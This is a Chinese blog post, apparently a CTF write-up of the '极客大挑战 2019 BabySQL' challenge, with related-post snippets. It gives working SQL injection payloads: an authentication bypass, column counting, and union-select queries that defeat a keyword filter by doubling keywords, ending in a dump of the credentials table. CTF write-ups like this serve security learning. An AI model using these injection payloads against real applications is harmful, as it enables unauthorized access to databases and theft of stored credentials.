极客大挑战2019babysql

已于 2022-05-28 10:39:09 修改
阅读量1.3k 收藏 10
点赞数 4
文章标签: sql 网络
于 2022-04-08 20:28:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kindyyy/article/details/123931692
版权

我也是参考了大佬的wp才会做的题目.....

大佬博客:[极客大挑战 2019]BabySQL - 云千 - 博客园

(对我自己来说)要一步一步的从查库,查表,查列,查字段慢慢来,从这道题我们还要注意有些命令是会被注释的,可以用双写绕过。

大概就是这样。先看题目吧:

先用万能密码:' or 1=1#   or被过滤,所以把or换成||,再注入试试。

存在注入,然后再查库查表再查数据。但是我们不能忽略,可能存在要绕过的情况。。先来查询它有几列(注意要把username换掉,要不然就直接登陆上去了。)

发现是order by都被注释掉,双写绕过一下。这里来补充一下双写注入的知识点 

 用oorrder bbyy 4 #绕过后,我们看回显的值,说明只存在3列

联合查询后,我们发现有一个表是空的,而且union select均被注释,同样的用双写绕过就好

 现在来查询库名,用database()

' ununionion seselectlect 1,2,database() #

我们就会得到,它所在的数据库是geek

 然后再查询表名。经过检测,我们发现information、from、where都被过滤,都用双写绕过一下就行了

1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #

此时我们可以知道数据所在的表的名称是b4bsql,再进行查询数据

1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #

 发现里面有id,password,username,看他们里面的内容就好了。

1' ununionion seselectlect 1,2,group_concat(id,password,username) frfromom geek.b4bsql

我们忽略了可能还有被注释的情况,其中password中的or被注释,所以双写绕过

1' ununionion seselectlect 1,2,group_concat(id,passwoorrd,username) frofromm geek.b4bsql #

得到了flag

flag{6792a57c-8613-4e66-aae5-f8f06f869f6b}

kindyyy
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
[挑战 2019]BabySQL 1 详细题解
偷一个月亮
09-01 5920
过滤 select or and union from http://6d3700e3-2a8a-4291-9f0b-67e729cae0a1.node3.buuoj.cn/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=datab...
[挑战 2019]BabySQL
qq_45237160的博客
01-12 355
我们首先用万能密码尝试登录,提示我们账号或者密码错误,可以证明 符号 or并没有起作用,应该是被过滤掉了,也证明了此处仍然存在注入点。然后爆表,这里试了好多次,一直以为information和schema也被过滤了,后来发现并没有,过滤的还是or,from也被过滤了。接下来联合查询进行查询回显的点,仍然报错 ,根据报错信息可知:union,select都被过滤为空了。访问链接,我们看到熟悉的界面,不过页面上的提示内容变了,告诉了我们这里会有过滤。仍然复写绕过,得到回显点,2和3处。
[GXYCTF2019]BabySQli
Yb_140的博客
09-10 214
在这道题中,判断返回的数组中第二个(下标为1)是否为“admin”,若为admin则判断输入密码的md5值是否等于查询结果的第三个,若相等则打印flag。如果有3个回显点,那么就会回显1,2,3(浅显的理解)看上去很像base64解码,但是解不出来。先随便登录一下,在页面源代码处发现。这里其实是base32解码,得到。再进行base64解码。
BUUCTF [挑战 2019]BabySQL
qq_52999628的博客
08-16 909
今天来做一道sql注入题,做这类题之前一直没有什么头绪,经常是各种常用的语句胡乱注入一通,所以这次想来完整记录一下整体思路,以供以后参考。 首先输入1'
buuctf 挑战 babysql
SopRomeo的博客
01-17 1678
emmmmm这道题,常规注入不可行,很明显过滤了什么字符,我试了下双写,没想到可行。。 接着就直接上图吧 跟之前lovesql差不多
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2699
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
最新发布
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 学院JAVA视频教程 新版 7大部分
[挑战 2019]BabySQL 1
ws1813004226的博客
05-26 1620
一、获取flag流程 我们先随便输入一个账号密码,查看URL发现是通过PUT方式传递数据到后台的。 我们首先判断是否存在SQL注入,我们尝试在username参数后加一个“ ’ ”,发现数据库直接爆出了错误,说明是存在注入的。 接下来我们用万能密码试一下,首先我们判断下这里是字符型注入还是数值型注入,先尝试1’ or ‘1’=‘1%23 发现不可行,所以我们再尝试数值型注入,输入:1’ or 1=1%23,爆出了数据库错误,猜测是过滤了or(其实这里也过滤了and),尝试双写or试下,成功爆出。p
[挑战 2019]LoveSQL 1(详细版)
qq_61861243的博客
09-26 714
1、首先打开网站页面,一看是一个登录界面,我们想到运用SQL注入,利用密码1’ or 1=1登陆一下,得到admin用户以及他的密码。2、根据之前获得的信息对我找flag没有啥有用的信息,我想到利用SQL语句查询一下刚刚得到的admin所在表的列信息,这里我使用1%27order by 4 %23 与 1%27order by 3 %23 对比判断出表的列数为3。(用%27替代’ , %23替代#)
BUUCTF [挑战 2019] BabySQL
Senimo
03-25 3849
BUUCTF [挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
挑战 2019]BabySQL
Keepb1ue的博客
12-03 6167
地址:[挑战 2019]BabySQL 一个登陆框,尝试admin/admin登陆 GET方式传参,测试注入 测试存在过滤 简单Fuzz一下 测试请求过快,出现429的情况,可以配置下延时爆破 出现Input your username and password都是被过滤的字符 知道被过滤的字符就好办了,使用双写绕过即可。 http://439fc8e9-c9d1-4fb5-858a-39b86d471f8c.node4.buuoj.cn:81/check.php?username=
Tamevic’s Ctf-Web writeup@BUUCTF Web合集(更新中...)
Tamevic的博客
06-20 866
Tamevic’s Ctf-Web writeup@BUUCTF Web 前言 大学所有课程都结束了,接下来还有考试和其他一些安排就要毕业了。从大二开始一直在说什么时候能有大块空闲时间好好学学ctf,但是课程安排比较紧张,一直没得空。现在好不容易有了大块时间,说开始就开始。 这次选择BUUCTF的Web题,这里题目基本都是历年各大赛事的原题,质量比较高,便于积累。 HCTF2018 WarmUp 环境一起就是一个滑稽…查看源码,提示去看source.php source.php里是源码 经过百度得知这
第十届挑战——部分web和RE的WP
A_dmin的博客
11-11 2696
第十届挑战——部分web和RE的WP web - 打比赛前先撸一只猫! web - 你看见过我的菜刀么 web - BurpSuiiiiiit!!! web - 性感潇文清,在线算卦 web - Easysql web - RCE me web - Lovelysql web - Babysql web - 神秘的三叶草 web - Jiang‘s Secret web - Hardsql web - 反序列化1.0 web - 又来一只猫 web - 你有
BUUCTF [挑战 2019]BuyFlag
weixin_41571993的博客
04-20 2095
靶场练习
[挑战 2019]babysql
03-16
"挑战 2019" 的 "babysql" 是一道 SQL 注入漏洞题目。题目要求通过提交带有恶意代码的 SQL 查询,绕过网站的验证机制并获取敏感信息。解决这道题目的关键在于对 SQL 注入的理解和利用。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值